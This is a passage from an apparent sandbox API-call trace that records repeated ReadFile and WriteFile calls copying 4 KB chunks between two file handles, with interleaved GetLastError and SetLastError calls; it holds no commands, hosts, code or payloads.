lpOverlapped=0x0) returned 1 [0102.795] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.795] GetLastError () returned 0x0 [0102.795] SetLastError (dwErrCode=0x0) [0102.795] GetLastError () returned 0x0 [0102.795] SetLastError (dwErrCode=0x0) [0102.795] GetLastError () returned 0x0 [0102.795] SetLastError (dwErrCode=0x0) [0102.795] GetLastError () returned 0x0 [0102.795] SetLastError (dwErrCode=0x0) [0102.795] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.795] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.796] GetLastError () returned 0x0 [0102.796] SetLastError (dwErrCode=0x0) [0102.796] GetLastError () returned 0x0 [0102.796] SetLastError (dwErrCode=0x0) [0102.796] GetLastError () returned 0x0 [0102.796] SetLastError (dwErrCode=0x0) [0102.796] GetLastError () returned 0x0 [0102.796] SetLastError (dwErrCode=0x0) [0102.796] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.797] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.798] GetLastError () returned 0x0 [0102.798] SetLastError (dwErrCode=0x0) [0102.798] GetLastError () returned 0x0 [0102.798] SetLastError (dwErrCode=0x0) [0102.798] GetLastError () returned 0x0 [0102.798] SetLastError (dwErrCode=0x0) [0102.798] GetLastError () returned 0x0 [0102.798] SetLastError (dwErrCode=0x0) [0102.798] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.798] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.798] GetLastError () returned 0x0 [0102.798] SetLastError (dwErrCode=0x0) [0102.798] GetLastError () returned 0x0 [0102.798] SetLastError (dwErrCode=0x0) [0102.798] GetLastError () returned 0x0 [0102.798] SetLastError (dwErrCode=0x0) [0102.798] GetLastError () returned 0x0 [0102.798] SetLastError (dwErrCode=0x0) [0102.798] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.799] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.799] GetLastError () returned 0x0 [0102.799] SetLastError (dwErrCode=0x0) [0102.799] GetLastError () returned 0x0 [0102.799] SetLastError (dwErrCode=0x0) [0102.799] GetLastError () returned 0x0 [0102.799] SetLastError (dwErrCode=0x0) [0102.799] GetLastError () returned 0x0 [0102.799] SetLastError (dwErrCode=0x0) [0102.799] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.799] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.799] GetLastError () returned 0x0 [0102.799] SetLastError (dwErrCode=0x0) [0102.799] GetLastError () returned 0x0 [0102.799] SetLastError (dwErrCode=0x0) [0102.799] GetLastError () returned 0x0 [0102.799] SetLastError (dwErrCode=0x0) [0102.799] GetLastError () returned 0x0 [0102.800] SetLastError (dwErrCode=0x0) [0102.800] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.800] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.800] GetLastError () returned 0x0 [0102.800] SetLastError (dwErrCode=0x0) [0102.800] GetLastError () returned 0x0 [0102.800] SetLastError (dwErrCode=0x0) [0102.800] GetLastError () returned 0x0 [0102.800] SetLastError (dwErrCode=0x0) [0102.800] GetLastError () returned 0x0 [0102.800] SetLastError (dwErrCode=0x0) [0102.800] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.800] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.800] GetLastError () returned 0x0 [0102.800] SetLastError (dwErrCode=0x0) [0102.801] GetLastError () returned 0x0 [0102.801] SetLastError (dwErrCode=0x0) [0102.801] GetLastError () returned 0x0 [0102.801] SetLastError (dwErrCode=0x0) [0102.801] GetLastError () returned 0x0 [0102.801] SetLastError (dwErrCode=0x0) [0102.801] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.801] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.801] GetLastError () returned 0x0 [0102.801] SetLastError (dwErrCode=0x0) [0102.801] GetLastError () returned 0x0 [0102.801] SetLastError (dwErrCode=0x0) [0102.801] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.801] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.802] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.802] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.802] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.901] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.901] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.901] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.902] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.902] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.903] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.903] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.903] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.903] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.903] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.903] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.903] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.904] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.904] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.904] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.904] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.904] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.904] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.904] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.905] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.905] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.905] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.905] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.905] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.905] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.905] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.906] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.906] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.906] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.908] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.908] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.908] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.908] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.908] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.908] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.908] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.909] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.909] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.909] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.909] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.909] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.909] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.909] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.910] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.910] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.910] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.910] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.910] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.910] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.910] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.911] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.911] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.911] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.911] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.911] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.911] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.911] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.912] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.912] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.912] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.912] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.912] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.912] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.912] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.913] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.913] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.913] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.913] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.913] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.913] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, 